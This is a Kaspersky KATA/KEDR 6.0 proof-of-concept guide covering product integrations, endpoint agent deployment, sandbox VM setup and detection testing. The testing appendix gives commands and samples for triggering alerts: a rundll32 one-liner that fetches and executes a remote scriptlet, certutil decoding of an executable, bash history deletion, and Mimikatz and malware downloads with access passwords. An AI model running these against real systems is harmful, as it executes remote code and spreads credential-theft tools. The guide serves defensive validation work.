5. Rename the .dat file obtained from HQ as

ksncli_private.dat

KATA & KEDR 6.0: POC Guide

 6. Open the Central Node web interface ->
<Settings> -> <Participation in KSN/KPSN>. Select
<KPSN> and upload the files generated during the
previous steps.

7. Optionally: The following steps enable you to

publish KATA detects in KPSN.
Open the KPSN web console.

Click on <kpsn_admin> -> <My profile> -> <Client

certificate>.

8. These files are in the downloaded archive.

9. Open the KATA web console: Settings -> <KPSN

reputation database>.
Enter the KPSN ip address or DNS name.
Upload the crt and key files downloaded from
KPSN.

KATA & KEDR 6.0: POC Guide

APPENDIX B: KASPERSKY SECURITY FOR MAIL
GATEWAY (KSMG) INTEGRATION
1. Open the KSMG web interface -> <Settings> ->
<Protection>

2. Enable KATA Integration, set the Central Node’s IP

address and the port.

3. Login to the Central Node web interface as

Administrator, open <External systems> tab and
<Accept> the connection.

4. Check the KATA connection state in KSMG web

interface and click <Close>.

KATA & KEDR 6.0: POC Guide

APPENDIX C: KASPERSKY WEB TRAFFIC SECURITY
(KWTS) INTEGRATION
1. Open the KWTS web interface -> <Settings> ->
<External Services> -> <KATA Integration>.

2. Add KATA Server, set the Central Node’s ip

address and port.
Click <Next>.

3. Confirm KATA server. Check SHA256 fingerprint

and click <Confirm>.

4. Login to the Central Node web interface as

Administrator, open <External systems> tab and
<Accept> connection.

KATA & KEDR 6.0: POC Guide

APPENDIX D: KATA/KEDR TESTING
1. Testing the operation of key KATA/EDR detection engines.

1.1. Network traffic is analyzed using the Anti-Malware Engine

Preconditions:
• Anti-malware engine is in active state, databases are updated. SPAN sensor is configured.
• KES advanced protection modules should be disabled.
N Steps Expected result
1. Download the EICAR file from The file is downloaded onto the
https://support.kaspersky.com/common/diagnostics/7399 workstation.
(Choose via http).
2. Check that alert information has appeared in the KATA console Anti-malware engine alert.

Example of the alert:

Example of the alert details:

KATA & KEDR 6.0: POC Guide

1.2 Network traffic is analyzed using the Anti-Malware Engine and Sandbox components.

Preconditions:
• The anti-malware engine is active, databases are updated, the SPAN sensor is configured.
• The Sandbox component is installed and in active state, and VM (Virtual Machine) images have been
uploaded
• The KES advanced protection modules should be disabled.
1.2.1 Mimikatz Sample
N Steps Expected result
3. Download the Mimikatz credentials harvesting software from An archive is downloaded onto. the
ftp://data100-ro:[email protected] workstation.
labs.com/mimikatz_x64.rar
4. Check that alert information on Mimikatz has appeared in the Anti-malware engine alert. Note:
KATA console Sandbox alert will also be available in the
console after the sample execution
process has completed.

Example of the alert:

Example of the alert details:

KATA & KEDR 6.0: POC Guide

1.2.2 Reprt Sample
N Steps Expected result
1 Download the sample from The object is downloaded onto the
ftp://data100-ro:[email protected] workstation.
labs.com/katatestfile/reprt.rar
2 Check that Sandbox alert information has appeared in the Sandbox alert is available in the console
KATA console. after the sample execution process has
completed.

Example of the alert:

Example of the Sandbox scan result:

KATA & KEDR 6.0: POC Guide

1.2. Domains are analyzed using the URL reputation component and KSN system.

Preconditions:
• KSN system is accessible
N Steps Expected result
1. Open the http://bug.qainfo.ru/test/wmuf_w link in the web Malicious domain is requested by the user.
browser. Note. If the website request is blocked by the
endpoint protection tool, please temporarily
disable the anti-malware tool.
2. Check that alert information on the malicious URL has Malicious host verdict and additional details
appeared in the KATA console. are presented in the console (this URL is in the
KSN list).

Example of the alert:

Example of the alert details:

KATA & KEDR 6.0: POC Guide

1.4. Detection using the Indicator of Attack (IOA) mechanism

1.4.1 Rundll32 execute JavaScript Remote Payload With GetObject

Test the execution of a remote script using rundll32.exe. On execution, notepad.exe will be opened.
Open the command prompt and run the following command (admin rights needed):
rundll32.exe javascript:”\..\mshtml,RunHTMLApplication
“;document.write();GetObject(“script:https://raw.githubusercontent.com/redcanaryco/atomic-red-
team/master/atomics/T1218.011/src/T1218.011.sct”).Exec();

Note: keep in mind to run the command you need to disable KES advanced protection modules

Check that the corresponding TAA alert information has appeared in the KATA Web console.

Detailed information on the incident (connections, processes and launch parameters etc.) is presented below:

1.4.2 Deobfuscate/Decode Files or Information

Open the command prompt and run the following command:
certutil -encode C:\Windows\System32\calc.exe %temp%\T1140_calc.txt
certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe

Check that the corresponding TAA alert information has appeared in the KATA Web console.

Detailed information on the incident (connections, processes and launch parameters etc.) is presented below:

KATA & KEDR 6.0: POC Guide

KATA & KEDR 6.0: POC Guide
1.5. Testing NTA

1.5.1 Network scanning

Perform network scanning using Nmap or a similar tool to obtain alerts from the KATA Intrusion Detection engine.

Example of the alert:

Example of the alert details:

KATA & KEDR 6.0: POC Guide

1.5.2 DNS request to malicious domain
In the command prompt on a workstation perform: nslookup bandtester.com

Example of the alert:

Example of the alert details:

KATA & KEDR 6.0: POC Guide

1.5.3 NFS traffic analysis
Scenario: malicious communication is established from customer’s network with attacker’s C2C server. Steps 3-3
simulate attacker’s activity. (We assume that the attacker has already got access to some system in our network;
please also, note that here we just making a replication of malicious activity by replaying previously recorded
traffic).

N Steps Expected result

1. Prepare Kali Linux Machine. Kali Linux Machine is prepared
Make sure that traffic from Kali Linux
machine reaches a KATA SPAN-port.
2. Download the sample to the Kali Linux The PCAP-file downloaded.
Machine
https://box.kaspersky.com/f/7b29cad5c
5ec477a8e08/

Pass: Ky5.7NCqKAXN~Ix_
3. Start a terminal session if not already
started and go to a folder with the
downloaded PCAP-file. For example, cd
~/tcpreplay

4. Run the following command: The command execution is complete.

sudo tcpreplay -i eth0
traffic_NFS_test.pcap
Then wait for the command to complete
(takes a few minutes).
5. Go to the KATA CN Web UI as sso user.
You should see 2 new alerts (1 IDS and 1
AM/SB alert). Explore them.

KATA & KEDR 6.0: POC Guide

 N Steps Expected result
6. Open the IDS alert, in payload - find
“EELFLVWIGFUAXFTL” string and then copy
Hex values
to the left of it. Save them somewhere for
later.

7. Go to the Sensor servers tab -> localhost

and then press
“Download traffic”

8. Specify “host “ip of the Kali Linux

Machine”” (host 10.69.135.106) in Filtering
rule field. Then press “Download”. As time
interval for traffic download – specify last
hour (should be usually specified by
default).

9. Doubleclick the downloaded traffic dump

to open it in Wireshark. Select in upper

left of dialog window,
Then search for Hex Value that you
previously obtained from the KATA IDS
alert.

10. By scrolling up and reviewing the packets

you can notice that there was actually a
NFS file transfer session between the

KATA & KEDR 6.0: POC Guide

 N Steps Expected result
compromised system (10.69.135.106) and
attackers C2C server (10.69.135.101).

KATA & KEDR 6.0: POC Guide

1.6 Testing TAA rule autosandboxing

N Steps Expected result

1. Download the archive with the sample from The archive auto-submission-sample-
https://box.kaspersky.com/f/ec3b0b023d1a4356bf42/?dl=1 infected-
c9654daddad1141a317fc88582d5a537.zip
Pass: Fx6*HZB}q1wMI)#W
is downloaded onto the workstation.
2. Unpack the archive. Change the extension of the sample to The sample is unpacked. The sample name
.exe is
c9654daddad1141a317fc88582d5a537.exe
3. Run the sample. Sandbox alert is available in the console
after the sample execution process has
completed.

Example of the alert:

Example of the alert details:

KATA & KEDR 6.0: POC Guide

1.6 Testing TAA rule with Linux

N Steps Expected result

1.On the victim Linux machine with
EDR agent installed run the
following command:
$rm ./.bash_history

2. Go to the KATA Web UI using You see “deleting_or_renaming_bash_history_log_linux” alert.

Security Senior Offices privileges.
Open “Alerts” tab.

3. Open the alert card.

4. Search related events

KATA & KEDR 6.0: POC Guide

 N Steps Expected result
5. Open the event card to see
details and explore a process
tree.

KATA & KEDR 6.0: POC Guide

APPENDIX E: ENDPOINT AGENT INSTALLATION AND
CONFIGURATION USING KSC MMC UI
1. Login to KATA CN as an Administrator
Open <Settings> -> <Certificates> and Download
the Server Certificate
Optionally: For additional host-based security
generate the Endpoint Agent certificate, (it will be
downloaded automatically) and enable <Validate
Endpoint Agent TLS certificates>

2. Open KSC.

3. Create the KEA installation package:

<Advanced> -> <Remote installation> ->
<Installation packages> -> <Create installation
package>.

KATA & KEDR 6.0: POC Guide

 4. Select <Create an installation package for a
Kaspersky product> and create a name for this
installation package.
Then specify the path to the endpointagent.kud file

5. Accept the EULA and privacy terms, then click

<Next>.
Once the package has been created, click on
<Finish>.

6. The next step is to install KEA:

Go to <Tasks> -> <New task> -> <Install
Application Remotely>.

KATA & KEDR 6.0: POC Guide

 7. Select <Kaspersky Endpoint Agent_3.12>.

8. Install the Network Agent if it’s not already installed,

using the New Task Wizard. Answer the questions,
finish and run this task.

9. Wait until the task has successfully completed.

KATA & KEDR 6.0: POC Guide

 10. The next step is to create your policy.
Select the devices group and in the New Policy
Wizard select <Kaspersky Endpoint Agent>.
Click on <Next> and then <Next> again on the
following screen.

11. Check the <KATA EDR> option and click on <Next>.

12. This page enables you to configure the connection

between KEA and the KATA Central Node.
Click on <Configure> and then check <Enable
KATA integration>.
Specify the IP address and check <Use pinned
certificate to secure connection>.

KATA & KEDR 6.0: POC Guide

 13. Select the <kata.crt> certificate you downloaded
at Step 2.3.4 above.

14. Optional: Click <Add client certificate> and upload

the client certificate which you downloaded at
Step 2.3.4 above.

15. Click on <Ok> and then <Next>.

Optional: Change the device isolation terms and
user notification settings.

Click <Next>.

KATA & KEDR 6.0: POC Guide

 16. Optional: Configure the quarantine and
synchronization options

Click <Next>.

17. Optional: Configure the application security

settings.
We recommend that you apply password
protection.

Click <Next>.

KATA & KEDR 6.0: POC Guide

 18. Optional: Specify proxy parameters.

Click <Next>.

19. Select this policy as <Active>.

Click <Next>.

20. Wait while the policy is applied to managed hosts.

KATA & KEDR 6.0: POC Guide

 21. The next step is to upload the KEDR license:
Go to <Kaspersky Licenses> -> <Add activation
code or key file>. Click repeatedly on <Next>.

22. Open the license key and check the <Automatically

distributed license key> option.

23. Open the Central Node web console as an

Administrator and check that the Endpoint Agents
appear correctly there.

KATA & KEDR 6.0: POC Guide

APPENDIX F: INSTALLING KASPERSKY ENDPOINT AGENT
FOR LINUX
Kaspersky Endpoint Agent for Linux is installed on individual devices in the organization's IT infrastructure that are
running under one of the Linux operating systems. The application constantly monitors the processes running on
these devices, open network connections and the files being modified. Kaspersky Endpoint Agent for Linux is also
known as LENA (Linux ENdpoint Agent). Before installing LENA on a device, verify that the device complies with the
hardware and software requirements: https://support.kaspersky.com/help/KATA/5.1/en-US/247944.htm

LENA can be installed using a remote installation. This guide describes the remote installation of LENA using
Kaspersky Security Center Web Console.

The installation consists of the following steps:

• Preparing;

• Creating the installation package;

• Creating the remote installation task;

• Creating and installing the policy.

Preparing for the LENA installation

1. Make sure the Kaspersky Endpoint Agent

Management web plug-in has already been
installed on the KSC Web Console. If not, install it:
https://support.kaspersky.com/help/MDR/KEALinu
x/en-US/200778.htm;
2. Make sure the Kaspersky Security Center Network
Agent has been installed on the device. If not, install
it. For more details:
• Network Agent Local installation:
https://support.kaspersky.com/help/KES4Linu
x/11.3.0/en-US/198105.htm
• Network Agent Remote installation:
https://support.kaspersky.com/help/KSC/14.2
/en-US/137593.htm.

3. Make sure you have kata.crt and

agent_cert_xxxx.pfx files. If not, check step 2.3.4

Creating the installation package

4. Download zip file of the Kaspersky Endpoint Agent

KATA & KEDR 6.0: POC Guide

 5. Go to the KSC Web console
Create the KEA installation package:
Deployment & Assignment -> Installation Packaged
->+ Add.

6. Select Create an installation package from a file

then Click Next.
Set a name for this installation package.
Click Browse, select downloaded zip file from klbox
and click Open.
Then click Next.

7. To accept the EULA and privacy terms scroll down

to the bottom, then tick I accept Private policy and
accept EULA. Then click Next -> OK

Creating the remote installation task

8. The next step is to install KEA:

Go to Devices -> Tasks -> Add.

KATA & KEDR 6.0: POC Guide

 9. Set New task properties:
• Application: Kaspersky Security Center 14
• Task type: Install application remotely
• Task name: your choice
Assign the task according to the deployment scenario
accepted on PoC and click Next.
.
NOTE: in this guide we will use manual selection of
hosts to install KEA.

10. Choose devices to install KEA, click Add, tick

selected devices, then click Next.

KATA & KEDR 6.0: POC Guide

 11. Choose the installation package and the Network
Agent.
Check Using Network Agent Click Next. Answer the
questions, select user accounts to access
systems.
Click Finish to complete the task.

KATA & KEDR 6.0: POC Guide

 12. Go to Devices->Tasks. Check your task and click
Start.

13. Wait until the task has successfully completed.

Creating and installing the policy

14. Perform steps 2.3.14-2.3.22 to create and install the

policy.

15. Open the KATA Central Node web console as an

Administrator and check that the Endpoint Agents
appear correctly there.

KATA & KEDR 6.0: POC Guide

APPENDIX G: CUSTOM VM CREATION
In some cases, it might be required to create a VM with a custom OS for your demo or PoC. Custom images of OSs
and applications are placed in the Storage section of the Sandbox web UI.

You can upload the following custom operating system images to the Storage (uploaded files must have the .ISO
extension):

• Windows XP

• Windows 7

• Windows 8.1 64-bit

• Windows 10 64-bit (up to version 1909)

1. Open the web interface of the KATA Sandbox, go

to Templates & Storage -> Storage, upload OS
installation image for your custom VM.

2. Go to Templates & Storage -> Templates, select

Add-> Create Template in the right upper corner
of the page

3. Specify the name and description. Chose

previously uploaded iso image for your custom vm
template. Click Proceed.

KATA & KEDR 6.0: POC Guide

 4. The template will boot from the installation iso,
complete the installation like a normal OS and
activate your OS.

5. Configure your OS according to

https://support.kaspersky.com/help/KATA/6.0/en
-US/248892.htm, install additional software, if
required. You can upload additional iso files with
your software to storage section as described in
step 1, and later mount them by selecting “Mount
iso” option on top of VNC window for template
customization.

6. Shutdown the OS when you finished your OS

preparation and customization.

7. Select the Create VM option at the upper right

corner.

8. Specify a name and, optionally, a description for

your VM. Then click Save.

KATA & KEDR 6.0: POC Guide

 9. Wait for the VM to be created.

10. If you haven’t configured malware interface for

your KATA SB, you will be presented with request
to obtain the debug symbols. Press Download
manifesto button on the No internet access pop
up.

If no pop up appeared – skip to step 18.

11. Inside the downloaded archive there will be a

powershell script for downloading and generating
debug symbols. On the system, where you’ll launch
this script, install Debugging Tools for Windows.

(It can be installed from the Windows SDK installer)

12. Unzip the archive, which was obtained on step 10.

Launch the sbsymtool script from powershell
session with admin permissions.

KATA & KEDR 6.0: POC Guide

 13. The symbols.zip file should be generated after the
script has been run.

14. In the KATA SB Web UI, on the template page–

select Actions -> Upload Symbols.

Select the symbols.zip which was obtained on the

previous step.

15. Select the Create VM option again.

16. Specify the VM name and (optionally) the

description again, the press Save.

17. Wait for the VM creation to finish.

18. When requested by wizard, proceed to Virtual

machines page of the KATA Sandbox UI.

KATA & KEDR 6.0: POC Guide

 19. On the “Virtual machines” page press “install” for
your VM. Wait for VM installation to complete.

20. After VM install has been completed, press

“Enable” for your VM on the “Virtual machines”
page.

21. After your VM has been enabled, wait for about 10

minutes. After that, Open the KATA CN web UI as
Administrator and go to Sandbox settings ->
Settings page. Select OS set as Custom and in VM
composition – tick your VM (it will have “Custom”
label). If you want, you can disable default VMs by
deselecting them.

22. If you have enabled multiple VMs (multiple custom

or custom in mix with default ones), in the KATA CN
web UI go to Custom rules -> Sandbox and create
a rule (or multiple rules) which conditions will define
what files will be sent to your custom VM for
analysis.

Seehttps://support.kaspersky.com/help/KATA/6.0
/en-US/246747.htm for details.

KATA & KEDR 6.0: POC Guide